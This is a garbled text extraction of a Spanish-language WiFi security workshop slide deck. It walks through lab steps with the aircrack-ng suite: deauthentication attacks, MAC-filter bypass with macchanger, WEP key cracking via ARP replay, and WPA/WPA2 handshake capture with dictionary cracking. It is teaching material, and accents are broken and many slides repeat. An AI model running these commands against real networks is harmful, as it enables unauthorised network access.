7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 494
Agenda
bull Conceptos de Seguridadbull Conociendo BackTrack
bull Armando el Laboratorio
bull Seguridad WLAN
bull Saltaacutendose la autenticacioacuten WLAN
bull
Fallas de encripcioacuten WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 594
I- Conceptos de Seguridad
bull Seguridad ldquoGrado de proteccioacuten contra unpeligro dantildeo o peacuterdidardquo (Mike Pastore)
bull Se pretende tener ndash Confidencialidad
ndash Integridad
ndash Disponibilidad
bull Datos en proceso almacenados o en traacutensito
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 694
Riesgo
bull Es cualquier posible evento que pudiera causarun peligro dantildeo o peacuterdida
bull El riesgo no se elimina
ndash
Aceptar el Riesgo ndash Minimizar el Riesgo
ndash Transferir el Riesgo
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 794
Amenaza
bull Causa potencial de un incidente no deseado locual podriacutea resultar en un dantildeo a un sistema u
organizacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 894
Amenazas
Password cracking
Man in the middle
Exploits
Denegacioacuten de servicio
Escalamiento de privilegios
Hacking de Centrales Telefoacutenicas
Keylogging Port scanning
Puertos vulnerables abiertos
Servicios de log inexistentes o que no son revisados
Desactualizacioacuten
Backups inexistentes
Uacuteltimos parches no instalados
Violacioacuten de la privacidad de los empleados
Destruccioacuten de equipamiento
Desastres naturales
Usuarios internos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 994
Maacutes Amenazas
Captura de PC desde el exteriorViolacioacuten de contrasentildeas
Interrupcioacuten de los servicios
VirusMails anoacutenimos con agresiones
Incumplimiento de leyes y regulaciones
Robo o extraviacuteo de notebooks palms
Robo de informacioacuten
Destruccioacuten de soportes documentales
Acceso clandestino a redes
Intercepcioacuten de comunicaciones voz ywireless
Programas ldquobomba troyanosrdquo
Acceso indebido a documentos impresos
Agujeros de seguridad de redes conectadas
Falsificacioacuten de informacioacuten paraterceros
Indisponibilidad de informacioacuten clave
Spamming
Ingenieriacute a social
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1094
Vulnerabilidad
bull Error o mala configuracioacuten de Software oHardware que individuos mal intencionadospueden explotar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1194
Vulnerabilidad
bull httpwwwsecurityfocuscom
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1294
Analogiacutea de Seguridad
Acepto el riesgo
Minimizo el riesgo
Transfiero el riesgo
Amenaza
Vulnerabilidad
Riesgo
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1394
Conexioacuten a Medios Alaacutembricos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1494
Conexioacuten a Redes inalaacutembricas
bull WiFi (80211x)bull 80211abull 80211bbull
80211gbull 80211n
bull Timo Arnall Joslashrn Knutsen and Einar SneveMartinussen
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1594
ClapgnagmlEncripcioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1694
Encripcioacuten
bull Privacidadbull Autenticacioacuten
bull Integridad
bull No repudio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794
Encripcioacuten
bull Encripcioacuten Simeacutetrica
bull Encripcioacuten Asimeacutetrica
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994
II- Armando el Laboratorio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094
Paraacutemetros del laboratorio
bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo
bull Abierto
bull Oculto
bull WEP
bull WPAWPA2
ndash MAC Addressbull 687F7404BE78 (LAN)
bull 687F7404BE7A (WLAN)
ndash Direcciones IPbull WL_AP1 192168165
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294
III- Conociendo BackTrack
bull
Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado
en un equipo de coacutemputo
bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades
ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394
Iniciando con BackTrack
bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD
bull Hacer clic en BackTrack Text ndash Default Boot Text
Mode
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494
Iniciando con BackTrack
bull Teclea el comando startx
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594
Iniciando con BackTrack
bull GUI de BackTrack 5
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694
Configurando la tarjeta
inalaacutembrica
bull Abre una terminal de consolabull Teclea iwconfig
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794
Configurando la tarjeta
inalaacutembrica
bull Teclea ifconfig wlan0 up
bull Teclea ifconfig wlan0
bull Anota la direccioacuten MAC de tu tarjeta
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894
Conectaacutendose al AP
bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994
Conectaacutendose al AP
bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo
bull Teclea iwconfig wlan0
bull Verifica que tengas la MAC del Access Point
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094
Configurando una IP de la red
bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up
bull Verifica tecleando ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194
Probando conectividad
bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC
bull Abre un navegador e intenta navegar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
